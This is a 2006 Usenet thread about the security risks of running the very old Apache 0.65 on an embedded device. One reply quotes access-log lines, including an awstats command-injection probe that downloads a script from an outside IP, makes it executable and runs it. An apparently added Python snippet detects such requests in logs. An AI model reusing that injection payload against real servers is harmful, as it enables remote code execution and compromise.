Risks with very old Apache version

Hello,

I have created a program that can be managed by a web browser.
Because this device has only a small piece of memory I have looked up a very
old apache webserver to run on this device.

I have installed apache 0.65.
This works great, but I have one question. What are the risks involved in
running this version? How can somebody crash this version of apache?
People can only look at the websites; they can't run their own html code.

thank you all!
chiel



0
chiel
2/2/2006 1:05:08 AM
comp.os.linux.development.apps

3 Replies
3033 Views


On a sunny day (Thu, 2 Feb 2006 02:05:08 +0100) it happened "chiel"
<chiel@gmx.net> wrote in <2b54b$43e15ac0$d55d5e77$5031@news.chello.nl>:

>Hello,
>
>I have created a program that can be managed by a web browser.
>Because this device has only a small piece of memory I have looked up a very
>old apache webserver to run on this device.
>
>I have installed apache 0.65.
>This works great, but I have one question. What are the risks involved in
>running this version? How can somebody crash this version of apache?
>People can only look at the websites; they can't run their own html code.
>
>thank you all!
>chiel
Not sure if that version's security is broken, but people can send all sorts of
shit in an HTTP request:
That could cause buffer overflows and possibly execute some code.
You need to read the Apache info pages.
And make sure your http.conf file prohibits anything you do not want,
like listing directories perhaps.
(Not sure 0.5 had a http.conf ..), also make sure they cannot use it
to forward to another url. For example, this:
66.232.140.73 - - [30/Jan/2006:14:16:20 +0100] "GET http://www.szlanna.com/prxjdg.cgi?ja HTTP/1.0" 403 274
should give a 403
There is the common attack these days:
aamiens-151-1-99-228.w86-198.abo.wanadoo.fr - - [30/Jan/2006:03:19:48 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 899
This person likely does not even know their PC is infected.
Will your apache handle this?
Telnet hostname 80 and try...
0
Me
2/2/2006 12:48:58 PM
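A defender-side check for the two access-log patterns quoted in the reply above, written as an added example (not code from this thread or from Apache): it parses common-format log lines and flags proxy-style absolute-URI requests and CGI command-injection probes, reporting whether the server refused them. The third sample line (192.0.2.10, status 200) is constructed to show a proxy request that was served rather than rejected with a 403.

```python
import re
from urllib.parse import unquote

# Apache common log format, as in the two access-log lines quoted above.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)\s+(?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)\s*$'
)
# Shell metacharacters and fetch/execute tokens, as seen in the awstats probe.
CMD_INJECTION_RE = re.compile(r'[|;`]|\b(wget|curl|chmod|sh)\b')

# Two lines quoted in the reply, plus one constructed (192.0.2.10) proxy request served 200.
SAMPLE_LOG = [
    '66.232.140.73 - - [30/Jan/2006:14:16:20 +0100] '
    '"GET http://www.szlanna.com/prxjdg.cgi?ja HTTP/1.0" 403 274',
    'aamiens-151-1-99-228.w86-198.abo.wanadoo.fr - - [30/Jan/2006:03:19:48 +0100] '
    '"GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20'
    '194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;'
    'echo%20YYY;echo|  HTTP/1.1" 404 899',
    '192.0.2.10 - - [30/Jan/2006:15:00:00 +0100] "GET http://example.com/ HTTP/1.0" 200 512',
]

def parse_line(line):
    """Split one common-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(target):
    """Name the request pattern; 'normal' when neither one applies."""
    if target.lower().startswith(("http://", "https://")):
        return "proxy-probe"          # absolute URI: asks us to act as a forward proxy
    query = target.partition("?")[2]
    if query and CMD_INJECTION_RE.search(unquote(query)):
        return "command-injection"    # shell syntax aimed at a CGI script
    return "normal"

def audit(lines):
    """One finding per suspicious request, noting whether the server refused it."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        kind = classify(rec["target"]) if rec else "normal"
        if kind == "normal":
            continue
        status = int(rec["status"])
        findings.append({"host": rec["host"], "kind": kind, "status": status,
                         "served": status < 400})  # not refused: needs attention
    return findings
```

Run `audit` over a real access log to confirm that every proxy-style request gets a 403, as the reply says it should.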
chiel wrote:
> I have installed apache 0.65.
> This works great, but I have one question. What are the risks involved
> running this version?? how can somebody crash this version off apache??

The first version of Apache with a vulnerability in bugtraq I found was
Apache 0.8. The first bug in Gnats on the Apache website is for Apache
1.2. When Apache 0.65 came out, there were no script kiddies or
spammers, so it is likely that there are some vulnerabilities in there.
If you feel like it, you can test it and fix them. However, you are
probably better off with something which is more recent and still
supported, like http://www.lighttpd.net/.

0
Sjoerd
2/2/2006 6:19:15 PM
In article <2b54b$43e15ac0$d55d5e77$5031@news.chello.nl>,
chiel <chiel@gmx.net> wrote:

>I have created a program that can be managed by a web browser.
>Because this device has only a small piece of memory I have looked up a very
>old apache webserver to run on this device.

Why use apache? There are other servers around that are
designed for embedded use.

--
http://www.spinics.net/lists/vfl/

0
ellis
2/2/2006 9:41:45 PM